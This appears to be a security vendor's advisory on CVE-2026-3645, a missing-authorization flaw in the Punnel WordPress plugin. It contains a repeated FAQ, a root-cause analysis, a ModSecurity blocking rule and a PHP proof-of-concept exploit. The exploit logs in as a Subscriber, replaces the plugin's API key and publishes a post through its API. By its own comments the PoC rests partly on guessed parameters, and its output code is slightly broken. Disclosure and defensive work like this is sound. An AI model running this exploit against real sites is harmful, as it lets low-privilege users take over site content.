What is CVE-2026-3645?

CVE-2026-3645 is a vulnerability in the Punnel Landing Page Builder plugin for WordPress, affecting versions up to 1.3.1. It involves missing authorization checks in the save_config() function, allowing authenticated attackers to overwrite the plugin’s configuration.

How does the vulnerability work?

The vulnerability allows authenticated users with Subscriber-level access to send a POST request to the ‘punnel_save_config’ AJAX action without proper capability checks. This enables them to change the API key and subsequently manipulate site content through the plugin’s public API.

Who is affected by this vulnerability?

Any WordPress site using the Punnel Landing Page Builder plugin version 1.3.1 or earlier is at risk. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Punnel plugin installed on your WordPress site. If it is version 1.3.1 or earlier, your site is vulnerable to CVE-2026-3645.

What are the potential impacts of this vulnerability?

The vulnerability allows attackers to overwrite the plugin’s configuration, including the API key, leading to unauthorized content manipulation. This can result in publishing malicious content or deleting important site pages.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the Punnel plugin to the latest version that addresses this issue. Additionally, implement capability checks and nonce verification in the AJAX handler to prevent unauthorized access.

What does the CVSS score of 5.3 mean?

The CVSS score of 5.3 indicates a medium severity vulnerability. This means that while it is not critical, it poses a significant risk that should be addressed to prevent potential exploitation.

What is the role of nonce verification in this context?

Nonce verification is crucial for protecting against CSRF attacks. Implementing nonce checks in the AJAX action would ensure that requests are legitimate and made by authenticated users, thus preventing unauthorized configuration changes.

How does the proof of concept demonstrate the issue?

The proof of concept outlines a two-step process where an authenticated user first logs in and then sends a crafted POST request to overwrite the configuration. This illustrates how easily an attacker can exploit the vulnerability without proper authorization checks.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Punnel plugin to prevent exploitation. Additionally, review user roles and restrict Subscriber access to minimize the risk of exploitation until the plugin can be updated.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 28, 2026

CVE-2026-3645: Punnel <= 1.3.1 – Missing Authorization to Authenticated (Subscriber+) Settings Update via 'punnel_save_config' AJAX Action (punnel-landing-page-builder)

CVE ID CVE-2026-3645

Plugin punnel-landing-page-builder

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.3.1

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3645 (metadata-based):
This vulnerability in the Punnel plugin allows authenticated attackers with Subscriber-level access to overwrite the plugin’s configuration and subsequently create, update, or delete arbitrary posts, pages, and products. The flaw resides in the plugin’s AJAX handler for saving configuration, which lacks proper authorization checks.

Atomic Edge research identifies the root cause as a missing capability check in the save_config() function. The function handles the ‘punnel_save_config’ AJAX action without verifying the user’s permissions via current_user_can(). The function also lacks nonce verification. These omissions are confirmed by the CWE-862 classification and vulnerability description. The analysis infers the function likely uses update_option() or a similar mechanism to store configuration data without sanitization validation.

Exploitation requires two sequential HTTP requests. First, an authenticated attacker sends a POST request to /wp-admin/admin-ajax.php with action=punnel_save_config and a config parameter containing a new API key. This request succeeds because no capability check exists. Second, the attacker uses the known API key to send requests to the public API endpoint at /?punnel_api=1. This endpoint validates requests by comparing a POST token against the stored api_key. The attacker can then use the plugin’s API functionality to manipulate content.

The remediation requires adding both capability checks and nonce verification. The plugin should implement current_user_can(‘manage_options’) or a similar administrator-level capability check before processing the save_config() function. The AJAX handler must also verify a nonce using check_ajax_referer() or wp_verify_nonce(). The public API endpoint should implement additional validation beyond simple API key matching.

Successful exploitation grants attackers content manipulation privileges. Attackers can modify any post, page, or product on the site. This includes publishing malicious content, defacing the site, or deleting critical pages. The attack chain enables privilege escalation from Subscriber to content editor capabilities. The CVSS vector indicates low impact on confidentiality (C:N) and availability (A:N) but direct impact on integrity (I:L).

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3645 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20263645,phase:2,deny,status:403,chain,msg:'CVE-2026-3645 via Punnel plugin AJAX - Missing Authorization',severity:'CRITICAL',tag:'CVE-2026-3645',tag:'WordPress',tag:'Plugin/Punnel'"
  SecRule ARGS_POST:action "@streq punnel_save_config" "chain"
    SecRule &ARGS_POST:config "!@eq 0"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3645 - Punnel <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Settings Update via 'punnel_save_config' AJAX Action
<?php

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to obtain WordPress cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$api_url = $target_url . '/?punnel_api=1';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Step 2: Overwrite plugin configuration with attacker-controlled API key
$new_api_key = 'attacker_controlled_key_' . bin2hex(random_bytes(8));
$config_payload = [
    'action' => 'punnel_save_config',
    'config' => json_encode(['api_key' => $new_api_key]) // Assumes JSON format
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $config_payload);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);

// Step 3: Use the known API key to create a malicious post via the public API
$api_payload = [
    'token' => $new_api_key,
    'operation' => 'create_post', // Assumed parameter based on description
    'post_data' => json_encode([
        'post_title' => 'Atomic Edge Exploit Test',
        'post_content' => 'This post was created via CVE-2026-3645',
        'post_status' => 'publish'
    ])
];

curl_setopt($ch, CURLOPT_URL, $api_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($api_payload));
$response = curl_exec($ch);

curl_close($ch);

// Output results
echo "Configuration update response: " . htmlspecialchars(substr($response, 0, 200)) . "n";
echo "API key set to: $new_api_keyn";
echo "API manipulation response: " . htmlspecialchars(substr($response, 0, 200)) . "n";

?>

Frequently Asked Questions

What is CVE-2026-3645?
Overview of the vulnerability
CVE-2026-3645 is a vulnerability in the Punnel Landing Page Builder plugin for WordPress, affecting versions up to 1.3.1. It involves missing authorization checks in the save_config() function, allowing authenticated attackers to overwrite the plugin’s configuration.
How does the vulnerability work?
Mechanics of the exploitation
The vulnerability allows authenticated users with Subscriber-level access to send a POST request to the ‘punnel_save_config’ AJAX action without proper capability checks. This enables them to change the API key and subsequently manipulate site content through the plugin’s public API.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Punnel Landing Page Builder plugin version 1.3.1 or earlier is at risk. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to assess vulnerability
To check for vulnerability, verify the version of the Punnel plugin installed on your WordPress site. If it is version 1.3.1 or earlier, your site is vulnerable to CVE-2026-3645.
What are the potential impacts of this vulnerability?
Understanding the risks
The vulnerability allows attackers to overwrite the plugin’s configuration, including the API key, leading to unauthorized content manipulation. This can result in publishing malicious content or deleting important site pages.
How can I fix or mitigate this issue?
Recommended remediation steps
To mitigate this vulnerability, update the Punnel plugin to the latest version that addresses this issue. Additionally, implement capability checks and nonce verification in the AJAX handler to prevent unauthorized access.
What does the CVSS score of 5.3 mean?
Interpreting the severity rating
The CVSS score of 5.3 indicates a medium severity vulnerability. This means that while it is not critical, it poses a significant risk that should be addressed to prevent potential exploitation.
What is the role of nonce verification in this context?
Importance of nonce checks
Nonce verification is crucial for protecting against CSRF attacks. Implementing nonce checks in the AJAX action would ensure that requests are legitimate and made by authenticated users, thus preventing unauthorized configuration changes.
How does the proof of concept demonstrate the issue?
Understanding the exploit
The proof of concept outlines a two-step process where an authenticated user first logs in and then sends a crafted POST request to overwrite the configuration. This illustrates how easily an attacker can exploit the vulnerability without proper authorization checks.
What should I do if I cannot update the plugin immediately?
Interim protective measures
If immediate updates are not possible, consider disabling the Punnel plugin to prevent exploitation. Additionally, review user roles and restrict Subscriber access to minimize the risk of exploitation until the plugin can be updated.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations